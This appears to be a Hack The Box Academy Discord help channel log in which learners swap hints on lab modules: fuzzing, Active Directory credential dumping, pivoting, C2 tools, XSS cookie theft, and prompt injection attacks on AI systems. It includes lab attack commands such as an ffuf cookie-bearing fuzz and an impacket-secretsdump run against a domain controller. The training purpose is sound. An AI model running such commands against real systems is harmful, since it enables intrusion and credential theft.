Slt

#

I speak frensh

gray yacht
# tight marten I speak frensh

Welcome to the server and that's awesome, however English is the only language that is to be used in this server. Venture over to #welcome follow the steps to have more access on the platform and read over the #rules

astral vine
astral vine
#

one sec let me look

#

I'm gonna DM you

hollow jackal
astral vine
#

I was legit missing the password by a single digit on that account when typing it out like a derp

#

only took me like 4-5 resets and me raging, but hey, we get there.

wild folio
#

On windows lateral movement module skill assessment, I've got the WSUS user and pw but I'm unable to run a powershell prompt as admin to run the SharpWSUS.exe tool on WSUS. What am I missing here?

#

I've been stuck here for a while, can anyone provide a hint?

urban raptor
#

anyone for Introduction to Dynamic Analysis with WinDbg - Skills Assessment Q1? Do not see any relevant memory writes in userspace - not sure what to even look for

gray yacht
wild folio
gray yacht
olive peak
#

@gray yacht are you available to be DM'd about a questions with the AD enum skills assessment part 1?

gray yacht
olive peak
#

correct

gray yacht
#

Sure you can DM.

rain mirage
#

The module : info gathering , skill assessment (web edition)

What is the API key in the hidden admin directory that you have discovered on the target system

For this fuzzing of subdomain or v host is required , yes or no ?

lost scarab
#

Can anyone provide some help for the LLM output attack skill assesment is been 5 days am still stuck on it

tribal lark
lavish steppe
#

Ohhhh guardiannn

static umbra
#

Hello all, I'm currently doing the Authentication bypass via parameter modification question under the broken auth module, and I used the following ffuf command to fuzz the correct user ID for admin, but nothing turned up:

ffuf -w tokens.txt -u "http://94.237.121.185:41461/admin.php?user_id=FUZZ" -b "PHPSESSID=38i5ccsqc5vjqdndasl2h6o2h4" -mr "Could not load admin data. Please check your privileges."

tokens.txt is till all 3-digit no.s

can someone tell what I am doing wrong?

nocturne tapir
#

Hey did you ever get that figured out?

lean bronze
static umbra
upper widget
#

Has anybody completed Intro to Academy's Purple Module?

wooden seal
upper widget
wooden seal
lofty stump
ionic blaze
#

Hey just curious if anyone has any advice or techniques with connection issues to the target box. These issues being session getting dropped prematurely or the web services being unresponsive. I'm currently working on the nibble initial foot hold and privilege escalation challenge however my reverse shell continues to be dropped and the admin login page will drop every so often and reloading the dashboard takes a few attempts and minutes to reload. I've tried gaining access from my local host, the pwnbox, and my VM with the same issues propagating across all of them. I've had my most success from the pwnbox however the sessions wont stay open long enough to complete enough commands to finish the lab.

tropic halo
#

yo guys sorry for being off topic but i can't acces the general channel in this server. Is it because I haven't verified yet or what? If so, does anyone know where my identifier is

storm elk
lost scarab
waxen totem
rain mirage
waxen totem
#

Aight DM me
-# Unsolicited DMs will be sent rules... and meme

wooden seal
#

@wraith ruin will reply here

#

@wraith ruin Use hashcat or john to crack hashes

wraith ruin
silver abyss
#

I'm kinda stuck with the password attacks module, assessment I managed to got Administrator on jump01 (winrm), but don't have a clue what to do next to go to DC01, any tips?

wooden seal
long flint
#

hey discord, quick question.

for this module Android Application Static Analysis, do i need an x64 computer? im on an m1 mac at the moment

wraith ruin
wooden seal
ionic blaze
west arrow
hushed rivet
#

how is in the sliver module still crackmapexec being used ?

autumn pilot
#

because it was written when CrackMapExec was still active

hushed rivet
#

time for update 🙂

#

having trouble getting the pivoting part to work

#

because of older stuff, i think ill switch back to the htb vm, since older stuff is probably installed there.

worn sun
#

I was able to get the DC01.pfx file but don't know how to proceed

#

when i try to to use the gettgptkinit.py to pass the certificate the command just hangs there until timeout

#

so can you please walk me through how did u solve it, i got the first flag using the second method but couldn't dump the adminstrator hash even if I had the klist set as the jpinkman, also why do we need the two ip addereses for?

sterile solstice
hushed rivet
#

😮

sterile solstice
#

ill eventually have to if i want to go for CAPE

hushed rivet
#

did u do with own box

#

or htb vm

#

coz i got to the assumed breach part on my own vm, but the pivoting part etc is to outdated to make it work on my own machine.

hushed rivet
#

well u have to put extension.json in sliver

#

but its outdated so when u install it on your machine it doesnt wanna connect, since its a different version.

#

talking about the pivoting part in Chisel

sterile solstice
#

i havent touched the CME one for a while, but i got stuck on an answer even after a lot of help. i cant remember exactly what it was. as for sliver, i knew exactly what i needed to finish the skills assessment but i could still never get through. i verified with others that i was doing the right thing, generating my beacons and implants correctly. they also had trouble. so maybe some skill issue but i've used CobaltStrike just fine.

#

I'd need to look at the modules again to identify properly what the issue is. i obviously moved onto other things for the moment lol.

hushed rivet
#

instead of CME you can use nxc

#

but i have problems with chisel 😛

sterile solstice
#

always nxc. its the best lol

silver abyss
#

While doing the assessment from password attacks module, I tried to scan the internal network through proxychains but that didn't work, although scanning network hosts from internal host using dropped binary of nmap worked like a charm. Any idea why nmap wasn't working with proxychains?

waxen totem
silver abyss
waxen totem
silver abyss
#

Ohh, okey, thanks!

sick depot
#

cant seem to get eyewitness to work any help?

sturdy lantern
robust mountain
#

Hi guys am new here. Nice to meet you all. I want to learn ethical hacking but don’t no where to start.

compact patrolBOT
jade lotus
#

Am I supposed to read something in the terminal to the left of the 200 status while using ffuf?

fathom pendant
#

deleted your image bc spoilers

#

generally speaking, some wordlists have blank lines meaning that if you visit /some/endpoint and the endpoint is blank, it still returns positive

jade lotus
#

So it's normal that it comes out that way, right? It's just that I've run ffuf several times already and the directory isn't showing up anywhere, and I'm not getting any other errors

#

im doing the 3º question here

#

could it be posible im using a small wordlist ?

fathom pendant
#

or you're fuzzing the wrong place

#

i.e. subdomain

jade lotus
#

the second question ask for the directories , and i do that on that direcotries and subsecuent ones insisde

fathom pendant
#

yes but there's several subdomains per q1

jade lotus
#

and using the extension i found

fathom pendant
#

there are multiple extensions

jade lotus
#

im doind indepth 1 , need to go further ?

fathom pendant
#

as per q2

#

depth 1/2 is fine

jade lotus
#

yeah , dont want to spoil , but i already answerd the extensions

#

i add the m with -e

fathom pendant
#

ye

jade lotus
#

recursive

fathom pendant
#

but my main point is that there's multiple subdomains

#

it's possible the one in your screenshot isn't the one you're looking for

jade lotus
#

i search in all the subdomains i answered in the question before

fathom pendant
#

try depth 3

#

:)

#

actually nvm it's not that deep in

jade lotus
#

i takes forever hahaha

#

im doding -t 200 but having no errors , so im not missing anything right ?

fathom pendant
#

it could also be your wordlist

jade lotus
#

i used /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ and medium

#

could it be i need to pick the large ?

fathom pendant
#

nope the word is in that list

jade lotus
#

im resetting the machine and trying again , dont know where the problem is ^_^Uu

jaunty ginkgo
#

Hey, does anyone have any contacts at Hack The Box or access to someone from their team? I need to speak to them directly regarding an urgent account issue. Please let me know if you can help

fathom pendant
compact patrolBOT
fathom pendant
jade lotus
#

forgot , web prefixes had in their list :/

fathom pendant
#

for the answer make sure you put :PORT and not the actual port number in the answer

jade lotus
#

yeah i read that , thanks fcor the advice

warped spade
#

what is this server even about

jaunty ginkgo
#

nopeee HTB supports guys never reply

fathom pendant
fathom pendant
jaunty ginkgo
#

ok thanks mate

lofty stump
#

anybody on the prompt injection attack skill assessment? HaWa corp website

grizzled schooner
#

Working through Meterpreter Tunneling and Port Forwarding

First question - Can you transfer a payload via ssh? I was able to use a separate method for this answer, but transferring a payload won't work --> stuck for second question. Please @ with replies

severe hedge
#

Good afternoon

echo roost
#

Anyone work on Intro to C2 Operations with Sliver Kerberos Delegation & Enumeration and get the s4u impersonation to work? SpecicallyStep 3:

Impersonate a privileged user and request a TGS ticket to access the CIFS service on the target computer. For example, the privileged user can be a local administrator of the target computer, sometimes we can even impersonate the domain admin. But the domain user could be configured as cannot be delegated. In our case, child\Administrator cannot be delegated, however, another domain admin user child\carrot can be delegated, so we impersonate carrot. The service name will not be verified, so even if the target service is eventsystem, we can modify it as the CIFS service.

I run the s4u just like it shows in the module but I don't get access to srv02 per my screen shots

#

I can't impersonate the carrot user for some reason. I have reverted the machine, reconnected my vpn, I did this yesterday and today after VM, vpn and reconnecting to everything and it still doesn't work.

echo roost
#

Still doesn't work

willow heron
#

hello guys in Pass the Certificate i have got the password for Administrator but i am not able to login any hint?
What are the contents of flag.txt on Administrator's desktop?

grizzled schooner
#

Not working unfortunately

#

Yeah works fine, can ssh in fine, but scp gets denied I guess?

flint palm
#

Guys who has done RDP and SOCKS Tunneling with SocksOverRDP

#

???

long lagoon
lofty stump
#

Can anybody help me with AI red Team Insecure output handling section? I am stuck!! I am able to get the cookie for the first XSS assignment. I understand the 2nd assignment but getting stuck. a hint would be very welcome 🥹

grizzled schooner
#

failed

#

I'm trying to get the payload to the target to open a shell currently

echo roost
grizzled schooner
#

This is not a server for illegal hacking - that isn't welcome here

muted crescent
#

lol

grizzled schooner
#

This is a server for learning ethical hacking, whereas what you're asking for is illegal.

<@&486603600085123073> for your visibility

grizzled schooner
gray yacht
acoustic owl
#

@digital dirge English only please

digital dirge
#

I want learn ethical hacking

#

how i learn

compact patrolBOT
digital dirge
#

can i do ethical hacking from window

grizzled schooner
#

You will get a VM to use from HTB that you can utilize if you do not have a VM or something else capable

#

^

gray yacht
grizzled schooner
#

yeah scp isn't working to move it

#

I just get denied

gray yacht
grizzled schooner
#

so stand up http server from my host first, then just grab from my "server" first?

#

While I have someone's attention - any idea why I tried to do the autoroute with msf but it keeps failing to validate session? The autoroute module won't run because there's no sessions running - verified that the msf proxy server is running as well

gray yacht
gray yacht
grizzled schooner
#

No I was attempting to utilize the Scanning without ICMP -> SOCKS with Proxychains bit, but I could be missing something.. There was a lot of syntax in this module, just trying to wrap my head around all of it

gray yacht
#

I don't remember that part of the section. You're working on this section Meterpreter Tunneling & Port Forwarding?

grizzled schooner
#

Yeha

#

Now I'm trying to get the payload using the http server you were talking about, just not finding my file I guess?

gray yacht
flint palm
#

Ok guys and hello. Having great trouble with loading SocksOverRdp

#

plugin

#

if someone did it

azure basin
#

I need help with a project

main valley
#

how do I do the labs in the modules. I am new to this platform

cloud urchin
hexed lintel
#

If you are new to the platform, Intro to Academy module will help

main valley
main valley
hexed lintel
# main valley how do you accomplish this. I get that you have to download the vpn file and con...

Follow these simple steps and connect to the VPN! Quick & Easy.

A VPN connection is required to practice on Hack The Box, but it can be challenging for total beginners to set it up. Here's a step-by-step process to connect and start training your hacking skills.

Follow Hack The Box for more tips and content.
🤔 For more questions and troubl...

▶ Play video
main valley
jolly oasis
#

Is anyone available for a little help on Cross-Site Scripting (XSS) > Phishing > Credential Stealing?
https://academy.hackthebox.com/module/103/section/984

I believe I have everything configured correctly but 'creds.txt' isn't being created. Also, I get 'Not Found' on the victim browser logging in. I do see the creds come across my PHP listener though.
Everything works find if I use a netcat listener. I see the creds come across etc. I'm thinking it must have something to do with the php script?

coral willow
#

hey all. Doing the sqlmap skills assessment, and am consistently getting slightly incorrect versions of the DB names. Trying to figure out why, wondering if anyone else has had this before. I have tried many different tamper and threads options, and still get incorrect DB names with 0 entries. I thought maybe it is due to latency with the timing attacks but would love a nudge in the right direction

limber schooner
#

Hello guys I'm new to you I want advice to start learning cyber security shops

jolly oasis
#

No, my notes say: "nmap's proxy option isn't fully finished yet so not all functions or traffic may be routed through the proxy. We can just use proxychains instead."

compact patrolBOT
fathom pendant
#

@limber schooner ^

limber schooner
#

Yes

tranquil wren
#

Hello everyone, I am on Attacking Windows Credential Manager section. i have gotten the cmd as admin and backed up the credentials, can someone give a small hint on transffering mimikatz or lazagne out to it? i have tried scp and winscp, and cert util. Thank you in advance.

willow heron
limber schooner
fathom pendant
gray yacht
willow heron
#

Just give me 3 m while i run my pc

polar raven
#

Hi,
I have a question for Kernel exploit in the windows Privesc for the CVE-2020-0668. In the exemple , they use the MozillaMaintenance service but It seems we don't have the permissions ot start this service in the lab.
https://academy.hackthebox.com/module/67/section/627
I'm wondering, is it normal, should we find another service ? In this case, which to chose without breakinbg our machine ?

tranquil wren
fathom pendant
#

it's literally an option labeled /drive:

#

the /directory/location,sharename can be swapped around too, so you can do /drive:linux,/tmp for

#

it gets mounted to a share \\tsclient\sharename in the above example \\tsclient\linux

left lintel
lunar kayak
#

hello guys i someone compromised my original account and used it to spam so i got banned but after i got controle of the account was wondering where i can get in touch with an admin to maybe help me get back in

lunar kayak
lunar kayak
willow heron
#

any hint guys hosts file: 10.129.234.174 dc01.inlanefreight.local
impacket-secretsdump -k -no-pass -dc-ip 10.129.234.174 -just-dc-user Administrator 'inlanefreight.local/DC01$'@dc01.inlanefreight.local
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[
] Using the DRSUAPI method to get NTDS.DIT secrets
[-] Bind context rejected: invalid_checksum
[] Something went wrong with the DRSUAPI approach. Try again with -use-vss parameter
[
] Cleaning up...

fathom pendant
rustic sage
fathom pendant
rustic sage
lunar kayak
cloud urchin
lunar kayak
cloud urchin
#

just dm me

jolly oasis
hollow owl
#

I am stuck on LLM-Output Attack module's skill assessment. I have the admin's password hash but am unable to crack it with all types of wordlists that are typically used. I was able to recover the admin_key but that is also not opening up newer avenues. Am I missing something? Can someone please show me the way. Thanks.

weak grove
#

ty @cloud urchin

jolly oasis
nova valley
#

do i need to purchase a VPS in the setting up section?

nova valley
#

okay ty

gilded radish
#

What is the largest Wide Area Network (WAN) that connects millions of Local Area Networks (LANs) globally?
Isn't it "Internet"?

gilded radish
#

Damn, tried once more time and it worked

#

I guess I used extra space

left lintel
#

Probably had an extra space or something, its picky

#

yea more than likely

gilded radish
#

yeah

#

What type of message does a client send to accept an IP address from a DHCP server?
DHCP Request?

#

Alice's laptop receives this offer and sends back a DHCP Request message to accept the IP address.

#

why it doesn't accept answer ohGod

left lintel
#

brother just try some other stuff i got it first try looking at the page for just a couple seconds

#

look at the DORA process

gilded radish
#

OMG itS JUST REQUEST

novel matrix
gilded radish
#

it accepts "Request", but not "DHCP Request"

#

idk what the problem to care about users and add a couple of answers as valid, they are valid anyways

left lintel
#

true

kind granite
#

Does tier 2 and downward give you a good foundation and skillset to start doing pentesting? Or would i need to work on some tier 3s and tier 4s?

ancient coyote
#

why is RDP so horrendous in academy

fathom pendant
fathom pendant
barren apex
#

anyone else having an issue when spawning a lab?
it takes forever saying Target(s) are spawning...

cloud urchin
#

Try pressing CTRL+SHIFT+R then try again

barren apex
analog carbon
#

can someone guide me 😐

novel matrix
#

@analog carbon do not spoil. please read channel desciption at the top

analog carbon
novel matrix
#

just ask for the module name and section and or drop the url to where you need

analog carbon
#

here sir, last question,

fathom pendant
fathom pendant
analog carbon
nova crag
fathom pendant
#

iirc you have to connect to the kali machine from the bob user

nova crag
#

sorry i probably wasnt clear, i was trying to connect to the kali from bob and it was RTO'ing

full echo
somber bison
#

Doing this: Linux Fundamentals, find files and directories (question 1) what is the name of the config file that has been created after 2020-03-03 and is smaller than 28kb but larger than 25k, the problem is when i do -exec ls -al {} ; in the find command, it simply says it cant find -exec

fathom pendant
somber bison
fathom pendant
#

did you do \; to end the exec args?

#

it needs to be escaped, it's not a typo in the module

somber bison
#

do you wanna see the full command

fathom pendant
#

so it ends \; 2>/dev/null ?

somber bison
#

also im doing it in powershell should i just switch back

fathom pendant
#

you should probably be doing this in bash terminal

somber bison
somber bison
#

it worked!

somber bison
fathom pendant
#

-size +Ns and -size -Ns; N is the size, s is the storage value (b,k,g,t...)

#
  • is above, - is below
#

so +Nk is above N Kilobytes, -Nk is below N kilobytes

somber bison
#

Two separate commands right?

fathom pendant
#

yes the -size has to be set in their own separate parameters

#

-size +10k -size -15k <-- range between 10 and 15 KB

somber bison
#

Thank you a lot

#

Aaand new problem, no files were found within that range

#

Nvm found the problem

fathom pendant
#

user error?

somber bison
#

All that just to find out im missing ssh

somber bison
#

Is there maybe a more affective way to count files 😅

eager spindle
#

I only know the service provider now, but I don’t know the version number

fathom pendant
#

-sU -sV not showing results?

eager spindle
#

No, and there is only the service name, and no version number after the service name

#

And it was also wrong for me to submit the answer using the service name

fathom pendant
#

If all else fails: use pwnbox [turn off the vpn on your own machine]

eager spindle
#

I tried it with pwnbox and it worked. Thank you.

rose sierra
#

I have a question, how do I verify in order to talk in the #general channel?

rose sierra
#

Thanks

lofty stump
north frigate
#

Cheers, I'd have a general question: If I finish a module while having an active subscription, do I still gain the reward-cubes for the completed modules? (you know, the small "+1 cube" thingies on some of the lab-questions)

fathom pendant
#

yes

#

in-general the cube return is the # you get over the full module

#

that all add up to the 20%

tulip perch
#

Does anyone having problems in RDP into the WIndows Group Privileges labs?

#

I keep getting credentials wrong while i copy paste them into xfreerdp and rdesktop

signal hound
#

Hi If i have gained a local admin account on a parent domain, can i authenticate with that account to a child domain?

sterile solstice
#

that depends on the forest/trust relationship

#

if its bi-directionary or transitory than yes

#

or unidirectional actually

#

so probably yes. but you can check those perms with something like PowerView

#

or if you got a bloodhound collect, hopefully it picked those up in its collect and if so, then you can view in BloodHound

#

another option may be to use your admin privs to gain more creds and then see if there is an account that is both on the parent domain and the child domain. dual homed accounts would be useful if you get dcsync

#

i dont think ive done that, but usually you'd get that in an nmap scan when you look at the banner

#

then try vsftpd -v

#

or --version

#

did that work?

#

i had a quick look, and it also looks like the linpill.sh they present in that module is a linPEAS light. it looks like it produces a bunch of .txt files with system info inside? so checking the output of that pillaging script should also help

wooden seal
#

i completed it

#

can help in 5 mins or something

hazy bay
#

While doing password attacks, I have no idea how to find the password using snaffler + powerhuntshares doesn't seem to be working despite basically copy-pasting the default command outlined in the material lol

atomic dagger
#

guys i have a question. how can i dump a TDO ( trusted keys ) without using mimikatz? how can i do the same thing from linux? secretdump and lsassy are not able to dump that information

ivory musk
#

I've been drowsily doing the CPTS path. Up until the password attacks kind of meh.. But the skills assessment was pretty great. I actually learnt something, and it was fun to do. I wasn't convinced after the convoluted mess before that it could have a coherent skills assessment that covers the content well. I was wrong. However built that lab, congrats, job well done!

sterile solstice
#

or a shadowcredentials attack

#

particularly useful if you have backup operator writes so you have extended copying privileges

atomic dagger
sterile solstice
#

ahhh i havent done that one yet

#

what section is that?

#

i cant see unless i unlock

atomic dagger
#

Active Directory Trust Attacks - trust account attack

sterile solstice
#

ahhh ok. then i'd be looking at impacket

#

there were a few 'unofficial' scripts, like rbac and childparent

#

but without having a proper look at the module im just guessing. i havent done any 'proper' AD attacks for a few months and im feeling rusty. sorry mate lol

wooden seal
#

still need help?

opal shuttle
#

i am getting netbios timeout in smb...i tried my own vm and htb pwnbox...i am not able to ping the box...dont know what is happening

lofty stump
wooden seal
crisp nacelle
#

hi

#

its redirecting me here

golden magnet
#

Hi there I'm new here but I need help if anyone is available

round marten
#

I've been stuck on the Active Directory Trust Attacks - Skills Assessment Question 2 for a while. I'm fairly sure I know the attack and searching this channel hints I was correct, but I cannot make it work and I cannot see why.

round marten
dapper moth
#

From what I’ve seen lately, Bloodhound-CE won’t give you a straight up path.
If you’re like me and prefer old tools, Bloodhound legacy should give you a path to own apexcargo

round marten
#

BH CE shows me a path but if there's a more correct path in the legacy option I guess i can fire it up and try

dapper moth
#

I’ll always resort to Legacy as it’s more straightforward

grizzled schooner
#

Socat Redirection with a Reverse Shell

Module mentions using the windows/x64/meterpreter/reverse_https payload - host is in linux, and I didn't see a linux equivalent to this - am I missing something?

rustic sage
#

Can I skip the step of Windows in Setting Up module? Is this step unavoidable in the future?

round marten
dapper moth
#

You can DM if you’d like

languid ridge
#

Anyone has done the Password attack skills assessment I could DM ? I think I'm pretty close but I've been stuck for days

grizzled schooner
#

I can try

haughty fiber
#

i dont understand dmz how can i solve password attacks skill assessment

#

should i do the pivoting module fist

#

also, is scanning through proxychains supposed to be damn slow

hushed rivet
#

htb please make it so that on complex modules, you can add more time to the box

#

i just came back from gym, and now have to do the whole exploit chain again. etc

#

while my beacon still works.

#

i have 32 mins remaining and cant add more time anymore to the machine.

waxen totem
hushed rivet
#

no you cant

#

if u already added time before

#

its on 29 mins now, and i cant increase it.

#

because i already allocated time before.

deft veldt
#

Hello, I have a question on this part, it shows incorrect password if I remove /netonly

hushed rivet
#

@waxen totem

#

see 22 minutes and still cant increase time.

waxen totem
hushed rivet
#

yea i know

#

but i want it so that if you have to do something or whatever, and then it counts down from that time that its possible to increase the time.

#

that would be nice if its possible

waxen totem
#

/feedback

hushed rivet
#

because now i have to do the entire attack chain etc again.

#

so i have to reset the machine, while its not even neccesary normally

#

i sended the feedback

#

ty

deft veldt
#

Hello, I have a question on the Active Directory Enumeration & Attacks - DCSync Q#2, I saw some advise here that the runas command should not have a /netonly however when I try that one, it does not work, basically it gives me a password error. I already reset the machine and try Start-Process command to but still not working. Is there a specific command that I can use?

dusky shale
#

Hello @novel matrix , I can't log in to HTB Academy account after trying many times, and I can't verify on Discord to chat without logging in

#

it says "We think you might be a bot..."

cloud urchin
dusky shale
#

Ok then thank you

#

I cant reach support without logging in

cloud urchin
#

Contacting via Email

If you are unable to reach the support chat, you can always contact support directly via email by emailing customerops@hackthebox.com.

deft veldt
digital pendant
#

nvm silly question from me 🙂

muted crescent
#

Hey guys, regardless of which machine I'm working on, very often when I try to scan it with nmap, I receive the following result whether I use sudo or not.
For example, in the solutions section it says to use nmap -A some_ip and you will get information about the ports. In reality, this is what I get as a result:

Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-23 17:39 EEST
Nmap scan report for 10.129.22.169
Host is up (2.9s latency).
All 1000 scanned ports on 10.129.22.169 are in ignored states.
Not shown: 952 filtered tcp ports (no-response), 48 filtered tcp ports (host-unreach)

polar raven
#

Impossible from my side to access my boxes since 15/20 min (not a problem from my side, my connection is good). the box crashed and desppite rebooting nothing up. I even change the VPN location. Am I alone ?

cloud urchin
dense spear
#

I am in the module Introduction to Linux Privilege Escalation (path Environment Enumeration) and I have no idea how can I solve this exercise:

"Enumerate the Linux environment and look for interesting files that might contain sensitive data. Submit the flag as the answer."

any suggesties please

muted crescent
polar raven
cloud urchin
muted crescent
#

Thanks, let me remove the flag and against all ports

#

nmap -sC -sV 10.129.22.169

#

nmap -A target_ip returns me the correct result on the pwnbox, but on my vm

└─$ nmap -A 10.129.22.169
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-23 18:05 EEST
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.21 seconds

dense spear
cloud urchin
muted crescent
#

correct, i stopped the the pwnbox and reset my vpn just in case and run the same nmap command

polar raven
muted crescent
#

I even terminate the box and start a new instance

polar raven
#

.viminfo, i also had a lot of difficulties for this one, so I use this command now, it gives you the latest 50 files modified :

find /{bin,etc,home,lib,lib32,lib64,media,mnt,opt,root,sbin,snap,srv,tmp,usr,var} -type f -printf "%T@ %p\n" 2>/dev/null | grep -v -E "/var/log/*/*|/usr/lib|/var/lib|/etc/systemd/system|/snap/core2*|/snap/lxd|/snap/snapd|/var/cache" | sort -n | cut -d' ' -f 2- | tail -n 50 | xargs ls -lat
dense spear
muted crescent
dense spear
#

This is just madness, I'm on the verge of a breakdown

worldly turret
#

the windows VM in pivoting, tunneling and port forwarding goes unresponsive every time i download a file inside there

#

i have been doing this skills assesment for 10 hours because ive had to reset the box 30 times and try to switch VPN config, use the pwnbox, use virtualbox, try everything

#

and this has been going on for 2 days too

fervent iris
#

why do nmap shows drastically different results everytime it is ran for host discovery?

i tested it on my local network nmap -sn 192.168.1.0/24 for host discovery, it showed different results each time, it seemed very unrelaiable for host discovery.
so what i'm i missing here?

cloud urchin
worldly turret
#

can someone help a brother out and check if you have the same problem as I do?

fervent iris
#

and of course the module doesn't use a local network, it uses a different network that i have no access over, so i used my local network for testing 🙂

cloud urchin
cloud urchin
fervent iris